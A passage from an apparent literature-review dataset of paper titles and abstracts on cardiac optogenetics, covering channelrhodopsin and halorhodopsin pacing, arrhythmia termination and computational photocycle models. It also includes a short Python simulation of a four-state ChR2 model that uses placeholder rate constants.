discoveries and therapies. To date, cardiac optogenetics has been studied with patch-clamp, multielectrode arrays, video microscopy, and an all-optical system measuring calcium transients. The future lies in achieving simultaneous optical acquisition of excitability signals and optogenetic control, both with high spatio-temporal resolution. Here, we make progress by combining optical mapping of action potentials with concurrent activation of channelrhodopsin-2 (ChR2) or halorhodopsin (eNpHR3.0), via an all-optical system applied to monolayers of neonatal rat ventricular myocytes (NRVM). Additionally, we explore the capability of ChR2 and eNpHR3.0 to shape action-potential waveforms, potentially aiding the study of short/long QT syndromes that result from abnormal changes in action potential duration (APD). These results show the promise of an all-optical system to acquire action potentials with precise temporal optogenetics control, achieving a long-sought flexibility beyond the means of conventional electrical stimulation. --- paper_title: Modulation of cardiac tissue electrophysiological properties with light-sensitive proteins. 
paper_content: AIMS ::: Optogenetics approaches, utilizing light-sensitive proteins, have emerged as unique experimental paradigms to modulate neuronal excitability. We aimed to evaluate whether a similar strategy could be used to control cardiac-tissue excitability. ::: ::: ::: METHODS AND RESULTS ::: A combined cell and gene therapy strategy was developed in which fibroblasts were transfected to express the light-activated depolarizing channel Channelrhodopsin-2 (ChR2). Patch-clamp studies confirmed the development of a robust inward current in the engineered fibroblasts following monochromatic blue-light exposure. The engineered cells were co-cultured with neonatal rat cardiomyocytes (or human embryonic stem cell-derived cardiomyocytes) and studied using a multielectrode array mapping technique. These studies revealed the ability of the ChR2-fibroblasts to electrically couple and pace the cardiomyocyte cultures at varying frequencies in response to blue-light flashes. Activation mapping pinpointed the source of this electrical activity to the engineered cells. Similarly, diffuse seeding of the ChR2-fibroblasts allowed multisite optogenetics pacing of the co-cultures, significantly shortening their electrical activation time and synchronizing contraction. Next, optogenetics pacing in an in vitro model of conduction block allowed the resynchronization of the tissue's electrical activity. Finally, the ChR2-fibroblasts were transfected to also express the light-sensitive hyperpolarizing proton pump Archaerhodopsin-T (Arch-T). Seeding of the ChR2/ArchT-fibroblasts allowed to either optogentically pace the cultures (in response to blue-light flashes) or completely suppress the cultures' electrical activity (following continuous illumination with 624 nm monochromatic light, activating ArchT). ::: ::: ::: CONCLUSIONS ::: The results of this proof-of-concept study highlight the unique potential of optogenetics for future biological pacemaking and resynchronization therapy applications and for the development of novel anti-arrhythmic strategies. --- paper_title: Photocycles of Channelrhodopsin-2 paper_content: Recent developments have used light-activated channels or transporters to modulate neuronal activity. One such genetically-encoded modulator of activity, channelrhodopsin-2 (ChR2), depolarizes neurons in response to blue light. In this work, we first conducted electrophysiological studies of the photokinetics of hippocampal cells expressing ChR2, for various light stimulations. These and other experimental results were then used for systematic investigation of the previously proposed three-state and four-state models of the ChR2 photocycle. We show the limitations of the previously suggested three-state models and identify a four-state model that accurately follows the ChR2 photocurrents. We find that ChR2 currents decay biexponentially, a fact that can be explained by the four-state model. The model is composed of two closed (C1 and C2) and two open (O1 and O2) states, and our simulation results suggest that they might represent the dark-adapted (C1-O1) and light-adapted (C2-O2) branches. The crucial insight provided by the analysis of the new model is that it reveals an adaptation mechanism of the ChR2 molecule. Hence very simple organisms expressing ChR2 can use this form of light adaptation. 
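The Photocycles of Channelrhodopsin-2 entry above describes a four-state scheme with two closed (C1, C2) and two open (O1, O2) states, light-driven C1 to O1 and C2 to O2 activation, open-state interconversion, and slow thermal C2 to C1 recovery. The forward-Euler sketch below illustrates how such a scheme can be integrated and how a photocurrent follows the open-state occupancies; all rate constants, conductance values and the linear irradiance scaling are illustrative placeholders, not the fitted parameters of the cited model.

```python
import numpy as np

def chr2_four_state(irradiance, t_on, t_off, dt=1e-4, V=-70e-3, E_rev=0.0):
    """Minimal four-state ChR2 photocycle sketch (closed C1/C2, open O1/O2); placeholder rates."""
    k1, k2 = 200.0 * irradiance, 40.0 * irradiance  # photo-activation C1->O1, C2->O2 (1/s)
    Gd1, Gd2 = 100.0, 50.0                          # channel closure O1->C1, O2->C2 (1/s)
    e12, e21 = 10.0, 15.0                           # inter-open transitions O1<->O2 (1/s)
    Gr = 0.3                                        # slow thermal recovery C2->C1 (1/s)
    g_max, gamma = 1.0e-9, 0.05                     # conductance (S) and O2/O1 conductance ratio

    C1, O1, O2, C2 = 1.0, 0.0, 0.0, 0.0             # all channels dark-adapted initially
    times = np.arange(0.0, t_off + 0.1, dt)
    current = np.zeros_like(times)
    for i, t in enumerate(times):
        light = 1.0 if t_on <= t < t_off else 0.0
        dC1 = Gr * C2 + Gd1 * O1 - light * k1 * C1
        dO1 = light * k1 * C1 - (Gd1 + e12) * O1 + e21 * O2
        dO2 = light * k2 * C2 - (Gd2 + e21) * O2 + e12 * O1
        dC2 = Gd2 * O2 - (light * k2 + Gr) * C2
        C1, O1, O2, C2 = C1 + dC1 * dt, O1 + dO1 * dt, O2 + dO2 * dt, C2 + dC2 * dt
        current[i] = g_max * (O1 + gamma * O2) * (V - E_rev)  # inward (negative) at -70 mV
    return times, current

t, I = chr2_four_state(irradiance=1.0, t_on=0.05, t_off=0.55)
print("peak photocurrent (A):", I.min())
```

State occupancies sum to one throughout (the transition terms cancel pairwise), and shifting population from the higher-conductance C1/O1 branch to the C2/O2 branch under sustained light is what produces the decay from peak toward a steady-state photocurrent described in the abstract.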
--- paper_title: Independent optical excitation of distinct neural populations paper_content: Sequencing the transcriptomes of more than 100 species of alga yields new channelrhodopsins with promising properties for optogenetics. A far red–shifted channelrhodopsin, Chrimson, opens up new behavioral capabilities in Drosophila, and alongside a fast yet light-sensitive blue channelrhodopsin, Chronos, enables independent excitation of two neuronal populations in brain slices. --- paper_title: Channelrhodopsin2 Current During the Action Potential: “Optical AP Clamp” and Approximation paper_content: Channelrhodopsin2 Current During the Action Potential: “Optical AP Clamp” and Approximation --- paper_title: Light-induced termination of spiral wave arrhythmias by optogenetic engineering of atrial cardiomyocytes paper_content: Aims Atrial fibrillation (AF) is the most common cardiac arrhythmia and often involves reentrant electrical activation (e.g. spiral waves). Drug therapy for AF can have serious side effects including proarrhythmia, while electrical shock therapy is associated with discomfort and tissue damage. Hypothetically, forced expression and subsequent activation of light-gated cation channels in cardiomyocytes might deliver a depolarizing force sufficient for defibrillation, thereby circumventing the aforementioned drawbacks. We therefore investigated the feasibility of light-induced spiral wave termination through cardiac optogenetics. ::: ::: Methods and results Neonatal rat atrial cardiomyocyte monolayers were transduced with lentiviral vectors encoding light-activated Ca2+-translocating channelrhodopsin (CatCh; LV.CatCh∼eYFP↑) or eYFP (LV.eYFP↑) as control, and burst-paced to induce spiral waves rotating around functional cores. Effects of CatCh activation on reentry were investigated by optical and multi-electrode array (MEA) mapping. Western blot analyses and immunocytology confirmed transgene expression. Brief blue light pulses (10 ms/470 nm) triggered action potentials only in LV.CatCh∼eYFP↑-transduced cultures, confirming functional CatCh-mediated current. Prolonged light pulses (500 ms) resulted in reentry termination in 100% of LV.CatCh∼eYFP↑-transduced cultures ( n = 31) vs. 0% of LV.eYFP↑-transduced cultures ( n = 11). Here, CatCh activation caused uniform depolarization, thereby decreasing overall excitability (MEA peak-to-peak amplitude decreased 251.3 ± 217.1 vs. 9.2 ± 9.5 μV in controls). Consequently, functional coresize increased and phase singularities (PSs) drifted, leading to reentry termination by PS–PS or PS–boundary collisions. ::: ::: Conclusion This study shows that spiral waves in atrial cardiomyocyte monolayers can be terminated effectively by a light-induced depolarizing current, produced by the arrhythmogenic substrate itself, upon optogenetic engineering. These results provide proof-of-concept for shockless defibrillation. --- paper_title: Multiple-Color Optical Activation, Silencing, and Desynchronization of Neural Activity, with Single-Spike Temporal Resolution paper_content: The quest to determine how precise neural activity patterns mediate computation, behavior, and pathology would be greatly aided by a set of tools for reliably activating and inactivating genetically targeted neurons, in a temporally precise and rapidly reversible fashion. 
Having earlier adapted a light-activated cation channel, channelrhodopsin-2 (ChR2), for allowing neurons to be stimulated by blue light, we searched for a complementary tool that would enable optical neuronal inhibition, driven by light of a second color. Here we report that targeting the codon-optimized form of the light-driven chloride pump halorhodopsin from the archaebacterium Natronomas pharaonis (hereafter abbreviated Halo) to genetically-specified neurons enables them to be silenced reliably, and reversibly, by millisecond-timescale pulses of yellow light. We show that trains of yellow and blue light pulses can drive high-fidelity sequences of hyperpolarizations and depolarizations in neurons simultaneously expressing yellow light-driven Halo and blue light-driven ChR2, allowing for the first time manipulations of neural synchrony without perturbation of other parameters such as spiking rates. The Halo/ChR2 system thus constitutes a powerful toolbox for multichannel photoinhibition and photostimulation of virally or transgenically targeted neural circuits without need for exogenous chemicals, enabling systematic analysis and engineering of the brain, and quantitative bioengineering of excitable cells. --- paper_title: Ultra light-sensitive and fast neuronal activation with the Ca2+-permeable channelrhodopsin CatCh paper_content: In this Technical Report, Kleinlogel and colleagues created and characterized a new channelrhodopsin-2 mutant with an enhanced permeability to calcium. Dubbed CatCh (calcium translocating channelrhodopsin), this new variant's enhanced calcium permeability mediates an accelerated response time and voltage response that is ~70-fold more light sensitive than that of wild-type channelrhodopsin-2. --- paper_title: Computational Optogenetics: Empirically-Derived Voltage- and Light-Sensitive Channelrhodopsin-2 Model paper_content: Channelrhodospin-2 (ChR2), a light-sensitive ion channel, and its variants have emerged as new excitatory optogenetic tools not only in neuroscience, but also in other areas, including cardiac electrophysiology. An accurate quantitative model of ChR2 is necessary for in silico prediction of the response to optical stimulation in realistic tissue/organ settings. Such a model can guide the rational design of new ion channel functionality tailored to different cell types/tissues. Focusing on one of the most widely used ChR2 mutants (H134R) with enhanced current, we collected a comprehensive experimental data set of the response of this ion channel to different irradiances and voltages, and used these data to develop a model of ChR2 with empirically-derived voltage- and irradiance- dependence, where parameters were fine-tuned via simulated annealing optimization. This ChR2 model offers: 1) accurate inward rectification in the current-voltage response across irradiances; 2) empirically-derived voltage- and light-dependent kinetics (activation, deactivation and recovery from inactivation); and 3) accurate amplitude and morphology of the response across voltage and irradiance settings. Temperature-scaling factors (Q10) were derived and model kinetics was adjusted to physiological temperatures. Using optical action potential clamp, we experimentally validated model-predicted ChR2 behavior in guinea pig ventricular myocytes. The model was then incorporated in a variety of cardiac myocytes, including human ventricular, atrial and Purkinje cell models. 
We demonstrate the ability of ChR2 to trigger action potentials in human cardiomyocytes at relatively low light levels, as well as the differential response of these cells to light, with the Purkinje cells being most easily excitable and ventricular cells requiring the highest irradiance at all pulse durations. This new experimentally-validated ChR2 model will facilitate virtual experimentation in neural and cardiac optogenetics at the cell and organ level and provide guidance for the development of in vivo tools. --- paper_title: Spectral characteristics of the photocycle of channelrhodopsin-2 and its implication for channel function. paper_content: In 2003, channelrhodopsin-2 (ChR2) from Chlamydomonas reinhardtii was discovered to be a light-gated cation channel, and since that time the channel became an excellent tool to control by light neuronal cells in culture as well as in living animals with high temporal and spatial resolution in a noninvasive manner. However, little is known about the spectral properties and their relation to the channel function. We have expressed ChR2 in the yeast Pichia pastoris and purified the protein. Flash-photolysis data were combined with patch-clamp studies to elucidate the photocycle. The protein absorbs maximally at approximately 480 nm before light excitation and shows flash-induced absorbance changes with at least two different photointermediates. Four relaxation processes can be extracted from the time course that we have analysed in a linear model for the photocycle leading to the kinetic intermediates P(1) to P(4). A short-lived photointermediate at 400 nm, suggesting a deprotonation of the retinal Schiff base, is followed by a red-shifted (520 nm) species with a millisecond lifetime. The first three kinetic intermediates in the photocycle, P(1) to P(3), are described mainly by the red-shifted 520-nm species. The 400-nm species contributes to a smaller extent to P(1) and P(2). The fourth one, P(4), is spectroscopically almost identical with the ground state and lasts into the seconds time region. We compared the spectroscopic data to current measurements under whole-cell patch-clamp conditions on HEK 293 cells. The lifetimes of the spectroscopically and electrophysiologically determined intermediates are in excellent agreement. The intermediates P(2) and P(3) (absorbing at 520 nm) are identified as the cation permeating states of the channel. Under stationary light, a modulation of the photocurrent by green light (540 nm) was observed. We conclude that the red-shifted spectral species represents the open channel state, and the thermal relaxation of this intermediate, the transition from P(3) to P(4), is coupled to channel closing. --- paper_title: Computational models of optogenetic tools for controlling neural circuits with light paper_content: Optogenetics is a new neurotechnology innovation based on the creation of light sensitivity of neurons using gene technologies and remote light activation. Optogenetics allows for the first time straightforward targeted neural stimulation with practically no interference between multiple stimulation points since either light beam can be finely confined or the expression of light sensitive ion channels and pumps can be genetically targeted. Here we present a generalised computational modeling technique for various types of optogenetic mechanisms, which was implemented in the NEURON simulation environment. 
It was demonstrated using two classical mechanisms for optical activation and silencing of cells: channelrhodopsin-2 (ChR2) and halorhodopsin (NpHR). We theoretically investigate the dynamics of the neural response of a layer 5 cortical pyramidal neuron (L5) to four different types of illuminations: 1) wide-field whole cell illumination, 2) wide-field apical dendritic illumination, 3) focal somatic illumination, and 4) focal axon initial segment (AIS) illumination. We show that whole-cell illumination of halorhodopsin most effectively hyperpolarizes the neuron and is able to silence the cell even when driving input is present. However, when channelrhodopsin-2 and halorhodopsin are concurrently active, the relative location of each illumination determines whether the response is modulated with a balance towards depolarization. The methodology developed in this study will be significant to interpret and design optogenetic experiments and in the field of neuroengineering in general. --- paper_title: Alternans and spiral breakup in human ventricular tissue model paper_content: Ventricular fibrillation (VF) is one of the main causes of death in the Western world. According to one hypothesis, the chaotic excitation dynamics during VF are the result of dynamical instabilities in action potential duration (APD), the occurrence of which requires that the slope of the APD restitution curve exceeds 1. Other factors such as electrotonic coupling and cardiac memory also determine whether these instabilities can develop. In this paper we study the conditions for alternans and spiral breakup in human cardiac tissue. Therefore, we develop a new version of our human ventricular cell model, which is based on recent experimental measurements of human APD restitution and includes a more extensive description of intracellular calcium dynamics. We apply this model to study the conditions for electrical instability in single cells, for reentrant waves in a ring of cells, and for reentry in two-dimensional sheets of ventricular tissue. We show that an important determinant for the onset of instability is the recovery dynamics of the fast sodium current. Slower sodium current recovery leads to longer periods of spiral wave rotation and more gradual conduction velocity restitution, both of which suppress restitution-mediated instability. As a result, maximum restitution slopes considerably exceeding 1 (up to 1.5) may be necessary for electrical instability to occur. Although slopes necessary for the onset of instabilities found in our study exceed 1, they are within the range of experimentally measured slopes. Therefore, we conclude that steep APD restitution-mediated instability is a potential mechanism for VF in the human heart. --- paper_title: Stimulating Cardiac Muscle by Light: Cardiac Optogenetics by Cell Delivery paper_content: Background: After the recent cloning of light-sensitive ion channels and their expression in mammalian cells, a new field, optogenetics, emerged in neuroscience, allowing for precise perturbations of neural circuits by light. However, functionality of optogenetic tools has not been fully explored outside neuroscience; and a non-viral, non-embryogenesis based strategy for optogenetics has not been shown before.
Methods and Results: We demonstrate the utility of optogenetics to cardiac muscle by a tandem cell unit (TCU) strategy, where non-excitable cells carry exogenous light-sensitive ion channels, and when electrically coupled to cardiomyocytes, produce optically-excitable heart tissue. A stable channelrhodopsin2 (ChR2) expressing cell line was developed, characterized and used as a cell delivery system. The TCU strategy was validated in vitro in cell pairs with adult canine myocytes (for a wide range of coupling strengths) and in cardiac syncytium with neonatal rat cardiomyocytes. For the first time, we combined optical excitation and optical imaging to capture light-triggered muscle contractions and high-resolution propagation maps of light-triggered electrical waves, found to be quantitatively indistinguishable from electrically-triggered waves. Conclusions: Our results demonstrate feasibility to control excitation and contraction in cardiac muscle by light using the TCU approach. Optical pacing in this case uses less energy, offers superior spatiotemporal control, remote access and can serve not only as an elegant tool in arrhythmia research, but may form the basis for a new generation of light-driven cardiac pacemakers and muscle actuators. The TCU strategy is extendable to (non-viral) stem cell therapy and is directly relevant to in vivo applications. --- paper_title: A comprehensive multiscale framework for simulating optogenetics in the heart paper_content: Optogenetics has emerged as an alternative method for electrical control of the heart, where illumination is used to elicit a bioelectric response in tissue modified to express photosensitive proteins (opsins). This technology promises to enable evocation of spatiotemporally precise responses in targeted cells or tissues, thus creating new possibilities for safe and effective therapeutic approaches to ameliorate cardiac function. Here we present a comprehensive framework for multiscale modelling of cardiac optogenetics, allowing both mechanistic examination of optical control and exploration of potential therapeutic applications. The framework incorporates accurate representations of opsin channel kinetics and delivery modes, spatial distribution of photosensitive cells, and tissue illumination constraints, making possible the prediction of emergent behaviour resulting from interactions at sub-organ scales. We apply this framework to explore how optogenetic delivery characteristics determine energy requirements for optical stimulation and to identify cardiac structures that are potential pacemaking targets with low optical excitation thresholds. --- paper_title: Optical mapping of optogenetically shaped cardiac action potentials paper_content: Light-mediated silencing and stimulation of cardiac excitability, an important complement to electrical stimulation, promises important discoveries and therapies. To date, cardiac optogenetics has been studied with patch-clamp, multielectrode arrays, video microscopy, and an all-optical system measuring calcium transients. The future lies in achieving simultaneous optical acquisition of excitability signals and optogenetic control, both with high spatio-temporal resolution. Here, we make progress by combining optical mapping of action potentials with concurrent activation of channelrhodopsin-2 (ChR2) or halorhodopsin (eNpHR3.0), via an all-optical system applied to monolayers of neonatal rat ventricular myocytes (NRVM).
Additionally, we explore the capability of ChR2 and eNpHR3.0 to shape action-potential waveforms, potentially aiding the study of short/long QT syndromes that result from abnormal changes in action potential duration (APD). These results show the promise of an all-optical system to acquire action potentials with precise temporal optogenetics control, achieving a long-sought flexibility beyond the means of conventional electrical stimulation. --- paper_title: Modulation of cardiac tissue electrophysiological properties with light-sensitive proteins. paper_content: AIMS: Optogenetics approaches, utilizing light-sensitive proteins, have emerged as unique experimental paradigms to modulate neuronal excitability. We aimed to evaluate whether a similar strategy could be used to control cardiac-tissue excitability. METHODS AND RESULTS: A combined cell and gene therapy strategy was developed in which fibroblasts were transfected to express the light-activated depolarizing channel Channelrhodopsin-2 (ChR2). Patch-clamp studies confirmed the development of a robust inward current in the engineered fibroblasts following monochromatic blue-light exposure. The engineered cells were co-cultured with neonatal rat cardiomyocytes (or human embryonic stem cell-derived cardiomyocytes) and studied using a multielectrode array mapping technique. These studies revealed the ability of the ChR2-fibroblasts to electrically couple and pace the cardiomyocyte cultures at varying frequencies in response to blue-light flashes. Activation mapping pinpointed the source of this electrical activity to the engineered cells. Similarly, diffuse seeding of the ChR2-fibroblasts allowed multisite optogenetics pacing of the co-cultures, significantly shortening their electrical activation time and synchronizing contraction. Next, optogenetics pacing in an in vitro model of conduction block allowed the resynchronization of the tissue's electrical activity. Finally, the ChR2-fibroblasts were transfected to also express the light-sensitive hyperpolarizing proton pump Archaerhodopsin-T (Arch-T). Seeding of the ChR2/ArchT-fibroblasts made it possible either to optogenetically pace the cultures (in response to blue-light flashes) or to completely suppress the cultures' electrical activity (following continuous illumination with 624 nm monochromatic light, activating ArchT). CONCLUSIONS: The results of this proof-of-concept study highlight the unique potential of optogenetics for future biological pacemaking and resynchronization therapy applications and for the development of novel anti-arrhythmic strategies. --- paper_title: Optogenetic control of heart muscle in vitro and in vivo paper_content: Stimulation of the light-activated cation channel channelrhodopsin-2 can depolarize heart muscle in vitro and in vivo, resulting in precise localized stimulation and constant prolonged depolarization of genetically targeted cardiomyocytes and cardiac tissue. --- paper_title: Channelrhodopsin2 Current During the Action Potential: “Optical AP Clamp” and Approximation paper_content: Channelrhodopsin2 Current During the Action Potential: “Optical AP Clamp” and Approximation --- paper_title: Light-induced termination of spiral wave arrhythmias by optogenetic engineering of atrial cardiomyocytes paper_content: Aims: Atrial fibrillation (AF) is the most common cardiac arrhythmia and often involves reentrant electrical activation (e.g. spiral waves).
Drug therapy for AF can have serious side effects including proarrhythmia, while electrical shock therapy is associated with discomfort and tissue damage. Hypothetically, forced expression and subsequent activation of light-gated cation channels in cardiomyocytes might deliver a depolarizing force sufficient for defibrillation, thereby circumventing the aforementioned drawbacks. We therefore investigated the feasibility of light-induced spiral wave termination through cardiac optogenetics. Methods and results: Neonatal rat atrial cardiomyocyte monolayers were transduced with lentiviral vectors encoding light-activated Ca2+-translocating channelrhodopsin (CatCh; LV.CatCh∼eYFP↑) or eYFP (LV.eYFP↑) as control, and burst-paced to induce spiral waves rotating around functional cores. Effects of CatCh activation on reentry were investigated by optical and multi-electrode array (MEA) mapping. Western blot analyses and immunocytology confirmed transgene expression. Brief blue light pulses (10 ms/470 nm) triggered action potentials only in LV.CatCh∼eYFP↑-transduced cultures, confirming functional CatCh-mediated current. Prolonged light pulses (500 ms) resulted in reentry termination in 100% of LV.CatCh∼eYFP↑-transduced cultures (n = 31) vs. 0% of LV.eYFP↑-transduced cultures (n = 11). Here, CatCh activation caused uniform depolarization, thereby decreasing overall excitability (MEA peak-to-peak amplitude decreased 251.3 ± 217.1 vs. 9.2 ± 9.5 μV in controls). Consequently, functional core size increased and phase singularities (PSs) drifted, leading to reentry termination by PS–PS or PS–boundary collisions. Conclusion: This study shows that spiral waves in atrial cardiomyocyte monolayers can be terminated effectively by a light-induced depolarizing current, produced by the arrhythmogenic substrate itself, upon optogenetic engineering. These results provide proof-of-concept for shockless defibrillation. --- paper_title: Optogenetic activation of Gq signalling modulates pacemaker activity of cardiomyocytes paper_content: Aims: Investigation of Gq signalling with pharmacological agonists of Gq-coupled receptors lacks spatio-temporal precision. The aim of this study was to establish melanopsin, a light-sensitive Gq-coupled receptor, as a new tool for the investigation of spatial and temporal effects of Gq stimulation on pacemaking in cardiomyocytes at an early developmental stage. Methods and results: A vector for ubiquitous expression of melanopsin was tested in HEK293FT cells, which showed light-induced production of inositol-1,4,5-trisphosphate and elevation of intracellular Ca2+ concentration. Mouse embryonic stem cells were stably transfected with this plasmid and differentiated into spontaneously beating embryoid bodies (EBs). Cardiomyocytes within EBs showed melanopsin expression and illumination (60 s, 308.5 nW/mm2, 470 nm) of EBs increased beating rate within 10.2 ± 1.7 s to 317.1 ± 16.3% of baseline frequency. Illumination as short as 5 s was sufficient for generating the maximal frequency response. After termination of illumination, baseline frequency was reached with a decay constant of 27.1 ± 2.5 s. The light-induced acceleration of beating frequency showed a sigmoid dependence on light intensity with a half maximal effective light intensity of 41.7 nW/mm2. Interestingly, EBs showed a high rate of irregular contractions after termination of high-intensity illumination.
Local Gq activation by illumination of a small region in a functional syncytium of cardiomyocytes led to pacemaker activity within the illuminated area. Conclusions: Light-induced Gq activation in melanopsin-expressing cardiomyocytes increases beating rate and generates local pacemaker activity. We propose that melanopsin is a powerful optogenetic tool for the investigation of spatial and temporal aspects of Gq signalling in cardiovascular research. --- paper_title: Light induced stimulation and delay of cardiac activity. paper_content: This article shows the combination of light activatable ion channels and microelectrode array (MEA) technology for bidirectionally interfacing cells. HL-1 cultures, a mouse derived cardiomyocyte-like cell line, transfected with channelrhodopsin were stimulated with a microscope coupled 473 nm laser and recorded with custom built 64 electrode MEAs. Channelrhodopsin induced depolarization of the cell can evoke action potentials (APs) in single cells. Spreading of the AP over the cell layer can then be measured with good spatiotemporal resolution using MEA recordings. The possibility for light induced pacemaker switching in cultures was shown. Furthermore, the suppression of APs can also be achieved with the laser. Possible applications include cell analysis, e.g. pacemaker interference or induced pacemaker switching, and medical applications such as a combined cardiac pacemaker and defibrillator triggered by light. Since current prosthesis research focuses on bidirectionality, this system may be applied to any electrogenic cell, including neurons or muscles, to advance this field. --- paper_title: Computational Optogenetics: Empirically-Derived Voltage- and Light-Sensitive Channelrhodopsin-2 Model paper_content: Channelrhodopsin-2 (ChR2), a light-sensitive ion channel, and its variants have emerged as new excitatory optogenetic tools not only in neuroscience, but also in other areas, including cardiac electrophysiology. An accurate quantitative model of ChR2 is necessary for in silico prediction of the response to optical stimulation in realistic tissue/organ settings. Such a model can guide the rational design of new ion channel functionality tailored to different cell types/tissues. Focusing on one of the most widely used ChR2 mutants (H134R) with enhanced current, we collected a comprehensive experimental data set of the response of this ion channel to different irradiances and voltages, and used these data to develop a model of ChR2 with empirically-derived voltage- and irradiance-dependence, where parameters were fine-tuned via simulated annealing optimization. This ChR2 model offers: 1) accurate inward rectification in the current-voltage response across irradiances; 2) empirically-derived voltage- and light-dependent kinetics (activation, deactivation and recovery from inactivation); and 3) accurate amplitude and morphology of the response across voltage and irradiance settings. Temperature-scaling factors (Q10) were derived and model kinetics was adjusted to physiological temperatures. Using optical action potential clamp, we experimentally validated model-predicted ChR2 behavior in guinea pig ventricular myocytes. The model was then incorporated in a variety of cardiac myocytes, including human ventricular, atrial and Purkinje cell models.
We demonstrate the ability of ChR2 to trigger action potentials in human cardiomyocytes at relatively low light levels, as well as the differential response of these cells to light, with the Purkinje cells being most easily excitable and ventricular cells requiring the highest irradiance at all pulse durations. This new experimentally-validated ChR2 model will facilitate virtual experimentation in neural and cardiac optogenetics at the cell and organ level and provide guidance for the development of in vivo tools. --- paper_title: Computational models of optogenetic tools for controlling neural circuits with light paper_content: Optogenetics is a new neurotechnology innovation based on the creation of light sensitivity of neurons using gene technologies and remote light activation. Optogenetics allows for the first time straightforward targeted neural stimulation with practically no interference between multiple stimulation points since either light beam can be finely confined or the expression of light sensitive ion channels and pumps can be genetically targeted. Here we present a generalised computational modeling technique for various types of optogenetic mechanisms, which was implemented in the NEURON simulation environment. It was demonstrated using two classical mechanisms for optical activation and silencing of cells: channelrhodopsin-2 (ChR2) and halorhodopsin (NpHR). We theoretically investigate the dynamics of the neural response of a layer 5 cortical pyramidal neuron (L5) to four different types of illuminations: 1) wide-field whole cell illumination, 2) wide-field apical dendritic illumination, 3) focal somatic illumination, and 4) focal axon initial segment (AIS) illumination. We show that whole-cell illumination of halorhodopsin most effectively hyperpolarizes the neuron and is able to silence the cell even when driving input is present. However, when channelrhodopsin-2 and halorhodopsin are concurrently active, the relative location of each illumination determines whether the response is modulated with a balance towards depolarization. The methodology developed in this study will be significant to interpret and design optogenetic experiments and in the field of neuroengineering in general. --- paper_title: Multiscale Computational Models for Optogenetic Control of Cardiac Function paper_content: The ability to stimulate mammalian cells with light has significantly changed our understanding of electrically excitable tissues in health and disease, paving the way toward various novel therapeutic applications. Here, we demonstrate the potential of optogenetic control in cardiac cells using a hybrid experimental/computational technique. Experimentally, we introduced channelrhodopsin-2 into undifferentiated human embryonic stem cells via a lentiviral vector, and sorted and expanded the genetically engineered cells. Via directed differentiation, we created channelrhodopsin-expressing cardiomyocytes, which we subjected to optical stimulation. To quantify the impact of photostimulation, we assessed electrical, biochemical, and mechanical signals using patch-clamping, multielectrode array recordings, and video microscopy. Computationally, we introduced channelrhodopsin-2 into a classic autorhythmic cardiac cell model via an additional photocurrent governed by a light-sensitive gating variable. Upon optical stimulation, the channel opens and allows sodium ions to enter the cell, inducing a fast upstroke of the transmembrane potential.
We calibrated the channelrhodopsin-expressing cell model using single action potential readings for different photostimulation amplitudes, pulse widths, and frequencies. To illustrate the potential of the proposed approach, we virtually injected channelrhodopsin-expressing cells into different locations of a human heart, and explored its activation sequences upon optical stimulation. Our experimentally calibrated computational toolbox allows us to virtually probe landscapes of process parameters, and identify optimal photostimulation sequences toward pacing hearts with light. --- paper_title: Cardiac applications of optogenetics. paper_content: In complex multicellular systems, such as the brain or the heart, the ability to selectively perturb and observe the response of individual components at the cellular level and with millisecond resolution in time, is essential for mechanistic understanding of function. Optogenetics uses genetic encoding of light sensitivity (by the expression of microbial opsins) to provide such capabilities for manipulation, recording, and control by light with cell specificity and high spatiotemporal resolution. As an optical approach, it is inherently scalable for remote and parallel interrogation of biological function at the tissue level; with implantable miniaturized devices, the technique is uniquely suitable for in vivo tracking of function, as illustrated by numerous applications in the brain. Its expansion into the cardiac area has been slow. Here, using examples from published research and original data, we focus on optogenetics applications to cardiac electrophysiology, specifically dealing with the ability to manipulate membrane voltage by light with implications for cardiac pacing, cardioversion, cell communication, and arrhythmia research, in general. We discuss gene and cell delivery methods of inscribing light sensitivity in cardiac tissue, functionality of the light-sensitive ion channels within different types of cardiac cells, utility in probing electrical coupling between different cell types, approaches and design solutions to all-optical electrophysiology by the combination of optogenetic sensors and actuators, and specific challenges in moving towards in vivo cardiac optogenetics. --- paper_title: Stimulating Cardiac Muscle by Light: Cardiac Optogenetics by Cell Delivery paper_content: Background: After the recent cloning of light-sensitive ion channels and their expression in mammalian cells, a new field, optogenetics, emerged in neuroscience, allowing for precise perturbations of neural circuits by light. However, functionality of optogenetic tools has not been fully explored outside neuroscience; and a non-viral, non-embryogenesis based strategy for optogenetics has not been shown before. Methods and Results: We demonstrate the utility of optogenetics to cardiac muscle by a tandem cell unit (TCU) strategy, where non-excitable cells carry exogenous light-sensitive ion channels, and when electrically coupled to cardiomyocytes, produce optically-excitable heart tissue. A stable channelrhodopsin2 (ChR2) expressing cell line was developed, characterized and used as a cell delivery system. The TCU strategy was validated in vitro in cell pairs with adult canine myocytes (for a wide range of coupling strengths) and in cardiac syncytium with neonatal rat cardiomyocytes.
For the first time, we combined optical excitation and optical imaging to capture light-triggered muscle contractions and high-resolution propagation maps of light-triggered electrical waves, found to be quantitatively indistinguishable from electrically-triggered waves. Conclusions: Our results demonstrate feasibility to control excitation and contraction in cardiac muscle by light using the TCU approach. Optical pacing in this case uses less energy, offers superior spatiotemporal control, remote access and can serve not only as an elegant tool in arrhythmia research, but may form the basis for a new generation of light-driven cardiac pacemakers and muscle actuators. The TCU strategy is extendable to (non-viral) stem cell therapy and is directly relevant to in vivo applications. --- paper_title: Methodology for patient-specific modeling of atrial fibrosis as a substrate for atrial fibrillation. paper_content: Personalized computational cardiac models are emerging as an important tool for studying cardiac arrhythmia mechanisms, and have the potential to become powerful instruments for guiding clinical anti-arrhythmia therapy. In this article, we present the methodology for constructing a patient-specific model of atrial fibrosis as a substrate for atrial fibrillation. The model is constructed from high-resolution late gadolinium-enhanced magnetic resonance imaging (LGE-MRI) images acquired in vivo from a patient suffering from persistent atrial fibrillation, accurately capturing both the patient's atrial geometry and the distribution of the fibrotic regions in the atria. Atrial fiber orientation is estimated using a novel image-based method, and fibrosis is represented in the patient-specific fibrotic regions as incorporating collagenous septa, gap junction remodeling, and myofibroblast proliferation. A proof-of-concept simulation result of reentrant circuits underlying atrial fibrillation in the model of the patient's fibrotic atrium is presented to demonstrate the completion of methodology development. --- paper_title: Mechanistic inquiry into the role of tissue remodeling in fibrotic lesions in human atrial fibrillation. paper_content: Atrial fibrillation (AF), the most common arrhythmia in humans, is initiated when triggered activity from the pulmonary veins propagates into atrial tissue and degrades into reentrant activity. Although experimental and clinical findings show a correlation between atrial fibrosis and AF, the causal relationship between the 